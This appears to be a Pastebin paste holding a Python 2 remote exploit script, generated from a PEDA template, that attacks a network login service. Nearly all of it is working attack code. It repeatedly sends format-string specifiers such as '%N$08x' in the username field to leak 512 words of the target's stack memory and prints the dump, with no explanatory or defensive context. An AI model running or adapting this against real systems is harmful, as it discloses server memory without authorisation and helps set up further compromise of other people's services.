Guest User

Untitled

a guest
Jul 27th, 2014
61
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #!/usr/bin/env python
  2. #
  3. # Template for remote TCP exploit code, generated by PEDA
  4. #
  5. import os
  6. import sys
  7. import struct
  8. import resource
  9. import time
  10. import re
  11.  
  12. def usage():
  13.     print "Usage: %s host port" % sys.argv[0]
  14.     return
  15.  
  16. from socket import *
  17. import telnetlib
  18. class TCPClient():
  19.     def __init__(self, host, port, debug=0):
  20.         self.debug = debug
  21.         self.sock = socket(AF_INET, SOCK_STREAM)
  22.         self.sock.connect((host, port))
  23.  
  24.     def debug_log(self, size, data, cmd):
  25.         if self.debug != 0:
  26.             print "%s(%d): %s" % (cmd, size, repr(data))
  27.  
  28.     def send(self, data, delay=0):
  29.         if delay:
  30.             time.sleep(delay)
  31.         nsend = self.sock.send(data)
  32.         if self.debug > 1:
  33.             self.debug_log(nsend, data, "send")
  34.         return nsend
  35.  
  36.     def sendline(self, data, delay=0):
  37.         nsend = self.send(data + "\n", delay)
  38.         return nsend
  39.  
  40.     def recv(self, size=1024, delay=0):
  41.         if delay:
  42.             time.sleep(delay)
  43.         buf = self.sock.recv(size)
  44.         if self.debug > 0:
  45.             self.debug_log(len(buf), buf, "recv")
  46.         return buf
  47.  
  48.     def recv_until(self, delim):
  49.         buf = ""
  50.         while True:
  51.             c = self.sock.recv(1)
  52.             buf += c
  53.             if delim in buf:
  54.                 break
  55.         self.debug_log(len(buf), buf, "recv")
  56.         return buf
  57.  
  58.     def recvline(self):
  59.         buf = self.recv_until("\n")
  60.         return buf
  61.  
  62.     def close(self):
  63.         self.sock.close()
  64.  
  65.  
  66. def exploit(host, port):
  67.     index = 0
  68.     done = False
  69.     stack = [] 
  70.     try:
  71.         # connect
  72.         port = int(port)
  73.         client = TCPClient(host, port, debug=0)
  74.        
  75.         print '[+] Stack dumper started'   
  76.         # 512 eq. 2048(512 * 4) bytes from stack
  77.         while index != 512:
  78.             # recieve username banner and send a crafted formatstring response
  79.             client.recv(1024)
  80.  
  81.             index += 1
  82.             fsr = "%{0}$08x".format(str(index))
  83.             client.send(fsr + '\n')
  84.  
  85.             # recieve password banner and send a empty response
  86.             client.recv(1024)
  87.             client.send('\n')
  88.            
  89.             # recieve email banner and send a empty response
  90.             client.recv(1024)
  91.             client.send('\n')
  92.            
  93.             # recieve the result message and extract the formatstring response
  94.             # from the username entry
  95.             l = re.findall(r"'(.*?)'", client.recv(1024))
  96.            
  97.             stack.append( l[0] )
  98.            
  99.             # recieve the retry message and response
  100.             client.recv(1024)
  101.             client.send('yes\n')
  102.        
  103.         # some insurence
  104.         client.close()
  105.        
  106.         for i in range(len(stack) / 4):
  107.             print '%08d:'%((i * 4)+1), stack[(i*4)], stack[(i*4)+1], stack[(i*4)+2],stack[(i*4)+3]
  108.  
  109.         print '[-] Stack dumper finished'
  110.    
  111.     except Exception:
  112.         # some insurence
  113.         client.close()
  114.         exit()
  115.  
  116. if __name__ == "__main__":
  117.     if len(sys.argv) < 3:
  118.         usage()
  119.     else:
  120.         exploit(sys.argv[1], sys.argv[2])
RAW Paste Data